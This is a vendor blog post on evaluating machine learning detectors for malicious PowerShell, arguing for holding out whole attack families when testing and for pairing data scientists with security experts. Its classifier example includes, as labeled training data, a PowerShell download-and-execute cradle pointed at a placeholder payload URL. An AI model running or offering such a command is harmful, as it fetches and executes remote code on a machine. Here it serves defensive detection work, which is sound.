Recall & Precision: Not the Whole Story on Cybersecurity Machine Learning Models

Written by Brenna Gibbons | Jun 26, 2022 4:00:00 AM

When touting the performance of a machine learning model, companies often cite metrics like recall or precision. When it comes to applying such a model to cybersecurity, however, these numbers can be deceiving: not necessarily because of any duplicity on the part of whoever cites them, but because of a surface-level understanding of how data science melds with cybersecurity.

In this blog post, we’ll discuss the validation of machine learning models for catching novel cyberattacks, and I’ll demonstrate the inherent advantage of pairing data scientists with cybersecurity experts.

The tricky thing about new cyber threats

The fun but challenging thing about being a data scientist in cybersecurity is that the landscape isn’t static. There are plenty of attackers using well-known types of attacks, and defending against those is one thing. It’s fairly simple to train a model to catch a known threat. But every day, there is also the possibility of a hacker coming up with something brand new; these are the threats that are most likely to evade detection. In order to excel at protection, you need to be able to catch new attacks, the likes of which you’ve never seen before. Machine learning can help achieve this - but only if you do it right!

In order to optimize a model to catch new threats, extra care must be taken in training and testing the model. Read on for questions to ask when evaluating threat detection models, and why it’s so important to have data science and cybersecurity experts working together.

Testing for what you really want to know

As an IT leader evaluating an AI-powered cybersecurity solution, what you really want, and where machine learning can excel, is in catching new, unknown threats. To explain one nuance in validating a model for this goal, let’s use PowerShell attacks as an example.

The simplest approach to identifying malicious PowerShell scripts would be a rule-based detection or heuristic (see my previous post How Data Science Can Save You from a Heuristics Headache). For example, a very simple rule could be set to look for the word “metasploit” in the command line. Such a rule can be high fidelity, but it would be very bad at catching new or different attacks.
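
A minimal sketch of such a rule in Python (illustrative only; the function name and command lines are invented for demonstration):

```python
# Illustrative keyword heuristic: flag any PowerShell command line
# containing the string "metasploit". High fidelity when it hits,
# but trivially evaded by anything it has never been told about.
def is_suspicious(command_line: str) -> bool:
    return "metasploit" in command_line.lower()

print(is_suspicious('powershell -nop -c "IEX (metasploit payload)"'))  # True
print(is_suspicious("powershell Get-ChildItem C:\\Users"))             # False
```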

Beyond heuristics, machine learning models can learn what is “normal” PowerShell behavior and predict a variety of threats. However, we need to be careful how we train these models. Cybersecurity experts know that PowerShell attacks come in many different families, and attacks that fall within the same family may look similar, though not identical. We therefore need to make sure that our approach detects attacks from multiple families, not just one, and that it generalizes well to novel attacks. 
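
To make this concrete, here is one way such a model could be set up. This is an illustrative sketch, not ActZero's actual pipeline: the command lines, labels, and feature choices are invented for demonstration, using scikit-learn.

```python
# Illustrative sketch: learn a classifier over PowerShell command lines
# using character n-gram features, so the model can score commands it
# has never seen verbatim, rather than matching fixed keywords.
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import make_pipeline

# Hypothetical labeled data: 0 = benign, 1 = malicious.
commands = [
    "powershell Get-ChildItem C:\\Users",
    "powershell -nop -w hidden -enc SQBFAFgA...",
    "powershell Get-Process | Sort-Object CPU",
    "powershell IEX (New-Object Net.WebClient).DownloadString('http://example.com/payload')",
]
labels = [0, 1, 0, 1]

model = make_pipeline(
    TfidfVectorizer(analyzer="char_wb", ngram_range=(3, 5)),
    LogisticRegression(),
)
model.fit(commands, labels)

# Score a previously unseen command line.
print(model.predict_proba(["powershell -enc ZQBjAGgAbwA..."])[:, 1])
```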

Developing models for known vs new attacks

When training a machine learning model, a typical workflow is to train and test the model repeatedly while tuning the parameters, before doing a final test with a special “holdout” test set to get your metrics of interest, such as recall or precision. One common way of choosing the training and test sets for data (at least, for non-time-series data) is to split the data randomly. 
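
In code, the random-split workflow is typically a one-liner. This sketch uses scikit-learn with placeholder data rather than real telemetry:

```python
# A common default: hold out a random 20% of the data for testing.
import numpy as np
from sklearn.model_selection import train_test_split

rng = np.random.default_rng(0)
X = rng.normal(size=(1000, 20))    # placeholder feature matrix
y = rng.integers(0, 2, size=1000)  # placeholder labels (0 benign, 1 malicious)

X_train, X_test, y_train, y_test = train_test_split(
    X, y, test_size=0.2, random_state=42
)
```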

However, if you split all your data randomly, chances are that when you are testing a given data point against the model, there will be another one that is extremely similar to it – e.g. from the same attack family – in the training data. Developing a model with this approach can lead to high performance on known families of attacks, and very poor performance on novel attacks. This kind of model has its uses, but you need to be aware of its limitations.

One way to force the model to be more generalizable is to withhold for testing not a random subset of all attacks, but whole families of attacks at a time. That way, the model is tested on something it has no previous examples of, as if it were a novel attack. This strategy works because many of the underlying components of attacks are the same, albeit with nuances. A model that is forced to learn these more generalizable characteristics in order to predict held-out attack families during development is also more likely to catch new attacks in the wild.
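
One way to implement the family-level holdout, assuming each sample carries an attack-family label, is a group-aware splitter such as scikit-learn's GroupShuffleSplit. The features and family IDs below are placeholders:

```python
# Family-aware split: hold out entire attack families, so the test set
# contains no family the model saw during training.
import numpy as np
from sklearn.model_selection import GroupShuffleSplit

rng = np.random.default_rng(0)
X = rng.normal(size=(1000, 20))            # placeholder feature matrix
y = rng.integers(0, 2, size=1000)          # placeholder labels
families = rng.integers(0, 10, size=1000)  # placeholder attack-family IDs

splitter = GroupShuffleSplit(n_splits=1, test_size=0.2, random_state=42)
train_idx, test_idx = next(splitter.split(X, y, groups=families))

# Sanity check: no family appears on both sides of the split.
assert set(families[train_idx]).isdisjoint(set(families[test_idx]))
```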

Models trained in these two ways have very different strengths. Yet, the aforementioned common metrics (recall and precision) don’t reflect the difference between the two if you only look at the headline numbers. In fact, the second model will often score lower, despite its importance in providing protection against an evolving attack landscape. It’s not that metrics are useless – far from it. But the key is defining to what test set your metrics apply, and knowing that a direct comparison of, for example, recall on a test set of known threats and recall on a test set of novel threats can hide real value in the latter. To catch nuances like these and build metrics that test what you really want to know, it’s valuable to have data scientists and domain experts working side by side.
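
A toy illustration of that caveat, with invented label arrays: the same metric, recall, computed on two different test sets tells two different stories, and the headline numbers alone don't reveal which regime was harder.

```python
# Illustrative only: identical-looking metrics can come from very
# different test conditions.
from sklearn.metrics import recall_score

# Hypothetical predictions on a test set of KNOWN attack families.
y_true_known = [1, 1, 1, 1, 0, 0, 0, 0]
y_pred_known = [1, 1, 1, 1, 0, 0, 0, 0]

# Hypothetical predictions on a test set of HELD-OUT (novel) families.
y_true_novel = [1, 1, 1, 1, 0, 0, 0, 0]
y_pred_novel = [1, 1, 1, 0, 0, 0, 0, 0]

print(recall_score(y_true_known, y_pred_known))  # 1.00 on known families
print(recall_score(y_true_novel, y_pred_novel))  # 0.75 on novel families
```

A model scoring 0.75 recall on families it has never seen may be doing a harder, and more valuable, job than one scoring 1.00 on families it trained alongside.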

When data science and security experts work together

Building a generalizable model goes much better when data science experts and cybersecurity experts work together. Data scientists approaching the problem with fresh eyes can come up with non-obvious characteristics for the model to use, while cybersecurity experts ensure that key characteristics are included. Data scientists can set up the test/train split to optimize either for catching known attacks (a random split among the data) or for novel attacks (holding out an entire type of attack at a time), while cybersecurity experts determine how the data breaks down into categories and provide a diversity of attack families.

Embedded cybersecurity experts within the team also contribute their deep domain knowledge of how to label data, categorize threats, and provide context and nuance. This helps guide the choices data scientists make as we develop models to keep you safe. 

To see other ways that data scientists and cybersecurity experts collaborate to stop cyber threats, check out a white paper I contributed to: The 'Hyperscale SOC' and the Minds Behind It: A Machine-learning Foundation for Effective Cybersecurity.

Know what you’re getting: How to ask data scientists, and cybersecurity vendors, about their models 

For some use cases, taking a random subsample of your data as the test set and using the rest to train is perfectly reasonable. And there are plenty of instances where an “off-the-shelf” model will perform to an acceptable standard. But when the margin for error is small, as it is when facing cyber threats, having trained data scientists oversee machine learning model development is crucial. Choices like how to split your data for testing can have an outsized impact on the effectiveness of the model, and metrics don’t always tell the whole story. 

Knowing what you do now about how typical performance metrics for machine learning models can be deceiving when applied to unforeseen attacks, how can you ensure that the model protecting you will achieve the outcomes you want it to? Here are three simple questions you can ask the next time a cybersecurity vendor tells you their model is a panacea:

  1. What data are you using to train your models? How do you test the models?
    • Listen for data: breadth of the data set, data across multiple types of attacks, and data from varying sources.
    • Listen for testing method: testing on random subsets vs. testing on carefully split data, such as whole attack families held out.

  2. Do you have data scientists and cybersecurity experts on your team? How do they work together?
    • Listen for: a yes to both, plus cybersecurity experts’ participation in feature engineering as well as data labeling and sourcing.

  3. How would your models react to attack types they haven’t seen before?
    • Listen for: details that reference the nuances across attack types, including both differences that might escape a narrowly trained model and similarities that allow models to generalize.

For more questions like these, check out our Cybersecurity Vendor Evaluation Package. Or, to test the efficacy of our solution when faced with darkweb-sourced malware, schedule a Ransomware Readiness Assessment today.